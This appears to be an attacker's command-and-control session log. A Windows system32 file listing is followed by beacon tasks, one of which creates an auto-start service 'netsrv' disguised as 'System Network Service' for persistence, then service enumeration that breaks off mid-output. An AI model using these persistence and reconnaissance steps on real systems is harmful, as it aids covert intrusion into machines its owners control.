09/15/2018 07:34:02 WinMetadata +F 43008 09/15/2018 07:28:30 winml.dll +F 129160 09/15/2018 07:28:22 winmm.dll +F 170960 09/15/2018 07:28:22 winmmbase.dll +F 2292224 03/07/2020 00:53:42 winmsipc.dll +F 87040 09/15/2018 07:28:38 WinMsoIrmProtector.dll +F 19968 09/15/2018 07:28:45 winnlsres.dll +F 35112 09/15/2018 07:28:45 winnsi.dll +F 80384 09/15/2018 07:28:38 WinOpcIrmProtector.dll +F 159112 03/07/2020 00:53:26 winquic.dll +F 1346192 03/07/2020 00:53:50 winresume.efi +F 1183504 03/07/2020 00:53:50 winresume.exe +D 0 09/15/2018 09:07:53 winrm +F 33 09/15/2018 07:28:26 winrm.cmd +F 204105 09/15/2018 07:28:26 winrm.vbs +F 31232 09/15/2018 07:28:51 winrnr.dll +F 50176 09/15/2018 07:28:29 winrs.exe +F 109056 09/15/2018 07:28:29 winrscmd.dll +F 28672 09/15/2018 07:28:29 winrshost.exe +F 2048 09/15/2018 07:28:29 winrsmgr.dll +F 14336 09/15/2018 07:28:29 winrssrv.dll +F 189952 09/15/2018 07:28:29 WinRtTracing.dll +F 2800128 09/15/2018 07:29:24 WinSAT.exe +F 375296 09/15/2018 07:29:24 WinSATAPI.dll +F 246272 09/15/2018 07:28:59 WinSCard.dll +F 379408 09/15/2018 07:28:57 WinSetupUI.dll +F 18944 09/15/2018 07:28:26 winshfhc.dll +F 329216 03/07/2020 00:53:24 winsku.dll +F 95232 09/15/2018 07:28:29 winsockhc.dll +F 542208 03/07/2020 00:53:34 winspool.drv +F 792992 09/15/2018 07:28:46 winsqlite3.dll +F 26112 09/15/2018 07:28:55 WINSRPC.DLL +F 66048 09/15/2018 07:28:47 winsrv.dll +F 91648 09/15/2018 07:28:46 winsrvext.dll +F 341392 03/07/2020 00:53:53 winsta.dll +F 815616 09/15/2018 07:28:34 WinSync.dll +F 236544 09/15/2018 07:29:14 WinSyncMetastore.dll +F 136192 09/15/2018 07:29:14 WinSyncProviders.dll +F 355360 03/07/2020 00:53:25 wintrust.dll +F 1387512 03/07/2020 00:53:26 WinTypes.dll +F 28160 09/15/2018 07:28:29 winusb.dll +F 58880 09/15/2018 07:28:45 winver.exe +F 43008 03/07/2020 00:53:34 WiredNetworkCSP.dll +F 286208 03/07/2020 00:53:53 wisp.dll +F 35840 09/15/2018 07:28:58 witnesswmiv2provider.dll +F 80600 09/15/2018 07:28:45 wkscli.dll +F 273944 09/15/2018 07:29:23 wkspbroker.exe +F 126976 09/15/2018 07:29:23 wkspbrokerAx.dll +F 438784 09/15/2018 07:28:44 wksprt.exe +F 31744 09/15/2018 07:28:45 wksprtPS.dll +F 290816 03/07/2020 00:53:28 wkssvc.dll +F 423480 03/07/2020 00:53:33 wlanapi.dll +F 308736 09/15/2018 07:28:25 wlancfg.dll +F 592896 09/15/2018 07:28:56 WLanConn.dll +F 201216 09/15/2018 07:28:25 wlandlg.dll +F 103424 09/15/2018 07:28:25 wlanext.exe +F 497664 09/15/2018 07:28:25 wlangpui.dll +F 225280 09/15/2018 07:28:24 WLanHC.dll +F 16384 09/15/2018 07:28:25 wlanhlp.dll +F 684544 09/15/2018 07:28:36 WlanMediaManager.dll +F 4271616 09/15/2018 07:29:19 WlanMM.dll +F 425472 03/07/2020 00:53:33 wlanmsm.dll +F 779264 09/15/2018 07:28:25 wlanpref.dll +F 67072 09/15/2018 07:28:25 WlanRadioManager.dll +F 472064 09/15/2018 07:28:25 wlansec.dll +F 2634752 03/07/2020 00:53:33 wlansvc.dll +F 36864 09/15/2018 07:28:25 wlansvcpal.dll +F 420864 09/15/2018 07:28:25 wlanui.dll +F 3584 09/15/2018 07:28:25 wlanutil.dll +F 367104 03/07/2020 00:53:26 Wldap32.dll +F 141728 03/07/2020 00:53:26 wldp.dll +F 120832 09/15/2018 07:28:25 wlgpclnt.dll +F 696320 09/15/2018 07:28:52 wlidcli.dll +F 283648 03/07/2020 00:53:43 wlidcredprov.dll +F 99328 09/15/2018 07:28:52 wlidfdp.dll +F 66048 09/15/2018 07:28:52 wlidnsp.dll +F 649216 03/07/2020 00:53:36 wlidprov.dll +F 29696 09/15/2018 07:28:30 wlidres.dll +F 2185216 03/07/2020 00:53:36 wlidsvc.dll +F 66336 09/15/2018 07:28:45 wlrmdr.exe +F 743216 03/07/2020 00:54:27 WMADMOD.DLL +F 747568 03/07/2020 00:54:27 WMADMOE.DLL +F 341392 09/15/2018 09:09:54 WMASF.DLL +F 14336 09/15/2018 09:10:01 wmcodecdspps.dll +F 39424 09/15/2018 09:10:04 wmdmlog.dll +F 95744 09/15/2018 09:10:04 wmdmps.dll +F 7680 09/15/2018 07:29:22 wmdrmsdk.dll +F 2560 09/15/2018 09:08:37 wmerror.dll +F 5632 09/15/2018 07:28:45 wmi.dll +F 46592 09/15/2018 07:28:22 wmiclnt.dll +F 419368 03/07/2020 00:53:34 wmicmiplugin.dll +F 166912 09/15/2018 07:28:29 wmidcom.dll +F 199680 09/15/2018 09:09:58 wmidx.dll +F 144673 09/15/2018 07:28:29 WmiMgmt.msc +F 29696 09/15/2018 07:29:24 wmiprop.dll +F 208896 09/15/2018 07:28:26 wmitomi.dll +F 1349632 09/15/2018 09:09:59 WMNetMgr.dll +F 11723776 03/07/2020 00:54:30 wmp.dll +F 1533952 09/15/2018 09:10:04 WMPDMC.exe +F 365568 09/15/2018 09:10:05 WmpDui.dll +F 218624 03/07/2020 00:54:30 wmpdxm.dll +F 301096 03/07/2020 00:54:30 wmpeffects.dll +F 394752 09/15/2018 07:28:29 WMPhoto.dll +F 9068544 09/15/2018 09:08:37 wmploc.DLL +F 388032 09/15/2018 09:08:37 wmpps.dll +F 125440 03/07/2020 00:54:30 wmpshell.dll +F 19456 09/15/2018 07:28:45 wmsgapi.dll +F 994816 09/15/2018 07:28:59 WMSPDMOD.DLL +F 1254400 03/07/2020 00:54:24 WMSPDMOE.DLL +F 2429768 03/07/2020 00:54:24 WMVCORE.DLL +F 2600808 09/15/2018 09:09:58 WMVDECOD.DLL +F 210432 09/15/2018 09:10:01 wmvdspa.dll +F 2255728 09/15/2018 09:09:57 WMVENCOD.DLL +F 344504 09/15/2018 09:10:05 WMVSDECD.DLL +F 448512 09/15/2018 09:10:02 WMVSENCD.DLL +F 684544 09/15/2018 09:09:57 WMVXENCD.DLL +F 29696 09/15/2018 09:10:01 WofTasks.dll +F 34304 09/15/2018 07:28:42 WofUtil.dll +F 41472 09/15/2018 07:28:32 WordBreakers.dll +F 105472 09/15/2018 07:29:24 WorkFolders.exe +F 835072 09/15/2018 07:29:24 WorkfoldersControl.dll +F 107008 09/15/2018 07:29:24 WorkFoldersGPExt.dll +F 61952 09/15/2018 07:29:24 WorkFoldersRes.dll +F 225280 09/15/2018 07:29:24 WorkFoldersShell.dll +F 2182456 03/07/2020 00:54:22 workfolderssvc.dll +F 227328 03/07/2020 00:53:28 wosc.dll +F 331104 03/07/2020 00:53:36 wow64.dll +F 20728 09/15/2018 07:28:26 wow64cpu.dll +F 505632 03/07/2020 00:53:36 wow64win.dll +F 17408 09/15/2018 07:28:55 wowreg32.exe +F 461824 03/07/2020 00:53:21 WpAXHolder.dll +F 102400 09/15/2018 07:28:50 wpbcreds.dll +F 1633280 09/15/2018 07:28:23 Wpc.dll +F 228864 09/15/2018 07:28:24 WpcApi.dll +F 1422336 03/07/2020 00:53:32 WpcDesktopMonSvc.dll +F 1098056 03/07/2020 00:53:32 WpcMon.exe +F 4687 09/15/2018 07:28:24 wpcmon.png +F 771072 03/07/2020 00:53:32 WpcRefreshTask.dll +F 270848 03/07/2020 00:53:32 WpcTok.exe +F 890368 03/07/2020 00:53:32 WpcWebFilter.dll +F 83968 09/15/2018 09:10:00 wpdbusenum.dll +F 1942016 09/15/2018 09:09:55 wpdshext.dll +F 30208 09/15/2018 09:09:55 WPDShextAutoplay.exe +F 66560 09/15/2018 09:09:55 WPDShServiceObj.dll +F 376832 09/15/2018 09:10:03 WPDSp.dll +F 223232 09/15/2018 09:10:02 wpd_ci.dll +F 1315328 03/07/2020 00:53:41 wpnapps.dll +F 359424 03/07/2020 00:53:41 wpnclient.dll +F 1644544 03/07/2020 00:53:41 wpncore.dll +F 24064 09/15/2018 07:28:34 wpninprc.dll +F 22016 09/15/2018 07:29:24 wpnpinst.exe +F 575488 03/07/2020 00:53:41 wpnprv.dll +F 256000 03/07/2020 00:53:41 wpnservice.dll +F 36864 03/07/2020 00:53:41 wpnsruprov.dll +F 97280 03/07/2020 00:53:41 WpnUserService.dll +F 14848 09/15/2018 07:28:30 WpPortingLibrary.dll +F 11264 09/15/2018 07:28:53 WppRecorderUM.dll +F 724 09/15/2018 07:28:46 wpr.config.xml +F 329216 03/07/2020 00:53:29 wpr.exe +F 173568 03/07/2020 00:53:53 WPTaskScheduler.dll +F 1321784 03/07/2020 00:53:32 wpx.dll +F 11264 09/15/2018 07:29:24 write.exe +F 4608 09/15/2018 07:28:29 ws2help.dll +F 434952 03/07/2020 00:53:54 ws2_32.dll +F 9216 09/15/2018 07:28:24 wscadminui.exe +F 293856 03/07/2020 00:53:33 wscapi.dll +F 218624 03/07/2020 00:54:18 wscinterop.dll +F 27136 09/15/2018 07:28:24 wscisvif.dll +F 13312 09/15/2018 07:28:29 WSClient.dll +F 94208 09/15/2018 07:28:44 WSCollect.exe +F 18944 09/15/2018 07:28:24 wscproxystub.dll +F 165888 09/15/2018 07:28:57 wscript.exe +F 312704 03/07/2020 00:53:33 wscsvc.dll +F 1182720 03/07/2020 00:54:18 wscui.cpl +F 697344 09/15/2018 07:28:38 WSDApi.dll +F 54272 09/15/2018 07:29:21 wsdchngr.dll +F 91648 09/15/2018 07:29:21 WSDPrintProxy.DLL +F 69632 09/15/2018 07:29:16 WSDScanProxy.dll +F 1465344 03/07/2020 00:54:11 wsecedit.dll +F 50688 09/15/2018 07:28:57 wsepno.dll +F 64000 09/15/2018 07:28:36 wshbth.dll +F 24064 09/15/2018 07:28:57 wshcon.dll +F 22016 09/15/2018 07:28:29 wshelper.dll +F 99328 09/15/2018 07:28:57 wshext.dll +F 18584 09/15/2018 07:29:24 wshhyperv.dll +F 12800 09/15/2018 07:28:46 wship6.dll +F 15360 09/15/2018 07:29:24 wshirda.dll +F 142336 09/15/2018 07:28:57 wshom.ocx +F 19968 09/15/2018 07:28:36 wshqos.dll +F 18432 09/15/2018 07:29:20 wshrm.dll +F 12800 09/15/2018 07:28:46 WSHTCPIP.DLL +F 17776 09/15/2018 07:28:56 wshunix.dll +F 36352 09/15/2018 07:29:25 wslapi.dll +F 32256 09/15/2018 07:28:26 WsmAgent.dll +F 4675 09/15/2018 07:28:26 wsmanconfig_schema.xml +F 32768 03/07/2020 00:53:36 WSManHTTPConfig.exe +F 75264 03/07/2020 00:53:36 WSManMigrationPlugin.dll +F 164352 09/15/2018 07:28:26 WsmAuto.dll +F 15872 09/15/2018 07:28:26 wsmplpxy.dll +F 37888 09/15/2018 07:28:26 wsmprovhost.exe +F 1559 09/15/2018 07:28:26 WsmPty.xsl +F 61952 09/15/2018 07:28:26 WsmRes.dll +F 2620928 03/07/2020 00:53:36 WsmSvc.dll +F 2426 09/15/2018 07:28:26 WsmTxt.xsl +F 275456 09/15/2018 07:28:26 WsmWmiPl.dll +F 66560 09/15/2018 07:28:57 wsnmp32.dll +F 18944 09/15/2018 07:28:29 wsock32.dll +F 43520 09/15/2018 07:28:25 wsplib.dll +F 2127360 03/07/2020 00:54:16 wsp_fs.dll +F 1782272 03/07/2020 00:54:16 wsp_health.dll +F 945664 09/15/2018 07:29:22 wsp_sr.dll +F 92160 03/07/2020 00:53:53 wsqmcons.exe +F 93184 03/07/2020 00:53:53 WSReset.exe +F 92672 09/15/2018 07:29:23 WSTPager.ax +F 64792 09/15/2018 07:28:44 wtsapi32.dll +F 1004544 03/07/2020 00:53:29 wuapi.dll +F 11264 09/15/2018 07:28:36 wuapihost.exe +F 47512 09/15/2018 07:28:34 wuauclt.exe +F 3006464 03/07/2020 00:53:29 wuaueng.dll +F 223744 09/15/2018 07:28:44 wuceffects.dll +F 49664 09/15/2018 07:28:44 WUDFCoinstaller.dll +F 156736 09/15/2018 07:28:52 WUDFCompanionHost.exe +F 256512 09/15/2018 07:28:52 WUDFHost.exe +F 188664 09/15/2018 07:28:52 WUDFPlatform.dll +F 55296 09/15/2018 07:28:59 WudfSMCClassExt.dll +F 583680 09/15/2018 07:28:44 WUDFx.dll +F 633416 09/15/2018 07:28:52 WUDFx02000.dll +F 83968 09/15/2018 07:28:44 wudriver.dll +F 69120 03/07/2020 00:53:29 wups.dll +F 35840 03/07/2020 00:53:29 wups2.dll +F 310272 09/15/2018 07:28:29 wusa.exe +F 476160 03/07/2020 00:53:29 wuuhext.dll +F 182272 03/07/2020 00:53:29 wuuhosdeployment.dll +F 574976 09/15/2018 07:29:21 wvc.dll +F 556544 09/15/2018 07:28:29 WwaApi.dll +F 39936 09/15/2018 07:28:29 WwaExt.dll +F 984888 03/07/2020 00:53:35 WWAHost.exe +F 556768 09/15/2018 07:28:25 WWanAPI.dll +F 82944 09/15/2018 07:29:25 wwancfg.dll +F 467456 03/07/2020 00:54:18 wwanconn.dll +F 75776 09/15/2018 07:29:25 WWanHC.dll +F 6578176 09/15/2018 07:29:25 wwanmm.dll +F 50688 09/15/2018 07:29:25 Wwanpref.dll +F 97280 09/15/2018 07:29:25 wwanprotdim.dll +F 86016 09/15/2018 07:29:25 WwanRadioManager.dll +F 1750528 03/07/2020 00:54:18 wwansvc.dll +F 95008 09/15/2018 07:28:25 wwapi.dll +F 176128 09/15/2018 07:28:29 XamlTileRender.dll +F 3584 09/15/2018 07:28:22 XAudio2_8.dll +F 589312 09/15/2018 07:28:22 XAudio2_9.dll +F 1049600 03/07/2020 00:53:31 XblAuthManager.dll +F 86528 09/15/2018 07:28:20 XblAuthManagerProxy.dll +F 88064 09/15/2018 07:28:20 XblAuthTokenBrokerExt.dll +F 1265152 09/15/2018 07:28:20 XblGameSave.dll +F 151552 09/15/2018 07:28:22 XblGameSaveExt.dll +F 39936 09/15/2018 07:28:22 XblGameSaveProxy.dll +F 32768 09/15/2018 07:28:20 XblGameSaveTask.exe +F 65024 09/15/2018 07:28:22 XboxGipRadioManager.dll +F 72704 09/15/2018 07:28:20 xboxgipsvc.dll +F 97280 09/15/2018 07:28:30 xboxgipsynthetic.dll +F 1228800 09/15/2018 07:29:13 XboxNetApiSvc.dll +F 47616 09/15/2018 07:29:14 xcopy.exe +F 44032 09/15/2018 07:29:14 XInput1_4.dll +F 10752 09/15/2018 07:29:14 XInput9_1_0.dll +F 48640 09/15/2018 07:28:30 XInputUap.dll +F 68096 09/15/2018 07:28:57 xmlfilter.dll +F 230848 03/07/2020 00:53:26 xmllite.dll +F 22016 09/15/2018 07:28:50 xmlprovi.dll +F 64000 09/15/2018 07:29:14 xolehlp.dll +F 355328 03/07/2020 00:53:44 XpsDocumentTargetPrint.dll +F 471040 09/15/2018 07:28:55 XpsGdiConverter.dll +F 1688064 03/07/2020 00:53:44 XpsPrint.dll +F 582656 09/15/2018 07:28:56 XpsRasterService.dll +F 2879488 03/07/2020 00:53:44 xpsservices.dll +F 4014 09/15/2018 07:29:24 xwizard.dtd +F 62464 09/15/2018 07:29:24 xwizard.exe +F 448000 09/15/2018 07:29:24 xwizards.dll +F 118272 09/15/2018 07:29:24 xwreg.dll +F 257536 09/15/2018 07:29:24 xwtpdui.dll +F 143360 09/15/2018 07:29:24 xwtpw32.dll +D 0 03/07/2020 00:55:55 zh-CN +D 0 09/15/2018 09:09:27 zh-TW +F 79872 09/15/2018 07:28:34 zipcontainer.dll +F 429568 03/07/2020 00:53:53 zipfldr.dll +F 30720 09/15/2018 07:28:36 ztrace_maps.dll + + +03/30 08:53:27 UTC [input] run sc create netsrv binPath= "C:\windows\system32\netsrv.exe" start= auto DisplayName= "System Network Service" +03/30 08:53:27 UTC [task] Tasked beacon to run: sc create netsrv binPath= "C:\windows\system32\netsrv.exe" start= auto DisplayName= "System Network Service" +03/30 08:53:28 UTC [checkin] host called home, sent: 126 bytes +03/30 08:53:28 UTC [output] +received output: +[SC] CreateService SUCCESS + + +03/30 08:54:22 UTC [input] run sc query "System network service" +03/30 08:54:22 UTC [task] Tasked beacon to run: sc query "System network service" +03/30 08:54:26 UTC [checkin] host called home, sent: 51 bytes +03/30 08:54:26 UTC [output] +received output: +[SC] EnumQueryServicesStatus:OpenService FAILED 1060: + +The specified service does not exist as an installed service. + + + +03/30 08:54:39 UTC [input] run sc query +03/30 08:54:39 UTC [task] Tasked beacon to run: sc query +03/30 08:54:40 UTC [checkin] host called home, sent: 26 bytes +03/30 08:54:40 UTC [output] +received output: + +SERVICE_NAME: Appinfo +DISPLAY_NAME: Application Information + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: AppXSvc +DISPLAY_NAME: AppX Deployment Service (AppXSVC) + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: AudioEndpointBuilder +DISPLAY_NAME: Windows Audio Endpoint Builder + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Audiosrv +DISPLAY_NAME: Windows Audio + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: BFE +DISPLAY_NAME: Base Filtering Engine + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: BrokerInfrastructure +DISPLAY_NAME: Background Tasks Infrastructure Service + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CDPSvc +DISPLAY_NAME: Connected Devices Platform Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CertPropSvc +DISPLAY_NAME: Certificate Propagation + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: ClickToRunSvc +DISPLAY_NAME: Microsoft Office Click-to-Run Service + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CoreMessagingRegistrar +DISPLAY_NAME: CoreMessaging + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: CryptSvc +DISPLAY_NAME: Cryptographic Services + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DcomLaunch +DISPLAY_NAME: DCOM Server Process Launcher + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Dhcp +DISPLAY_NAME: DHCP Client + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DiagTrack +DISPLAY_NAME: Connected User Experiences and Telemetry + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Dnscache +DISPLAY_NAME: DNS Client + TYPE : 30 WIN32 + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DoSvc +DISPLAY_NAME: Delivery Optimization + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DPS +DISPLAY_NAME: Diagnostic Policy Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: DusmSvc +DISPLAY_NAME: Data Usage + TYPE : 10 WIN32_OWN_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: EventLog +DISPLAY_NAME: Windows Event Log + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: EventSystem +DISPLAY_NAME: COM+ Event System + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: FontCache +DISPLAY_NAME: Windows Font Cache Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: gpsvc +DISPLAY_NAME: Group Policy Client + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: IKEEXT +DISPLAY_NAME: IKE and AuthIP IPsec Keying Modules + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: iphlpsvc +DISPLAY_NAME: IP Helper + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: KeyIso +DISPLAY_NAME: CNG Key Isolation + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: LanmanServer +DISPLAY_NAME: Server + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: LanmanWorkstation +DISPLAY_NAME: Workstation + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: lmhosts +DISPLAY_NAME: TCP/IP NetBIOS Helper + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: LSM +DISPLAY_NAME: Local Session Manager + TYPE : 30 WIN32 + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: mpssvc +DISPLAY_NAME: Windows Defender Firewall + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: NcbService +DISPLAY_NAME: Network Connection Broker + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: Netlogon +DISPLAY_NAME: Netlogon + TYPE : 20 WIN32_SHARE_PROCESS + STATE : 4 RUNNING + (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: netprofm +DISPLAY_NAME: Network List Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: NgcCtnrSvc +DISPLAY_NAME: Microsoft Passport Container + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: NlaSvc +DISPLAY_NAME: Network Location Awareness + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 (0x0) + SERVICE_EXIT_CODE : 0 (0x0) + CHECKPOINT : 0x0 + WAIT_HINT : 0x0 + +SERVICE_NAME: nsi +DISPLAY_NAME: Network Store Interface Service + TYPE : 30 WIN32 + STATE : 4 RUNNING + (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) + WIN32_EXIT_CODE : 0 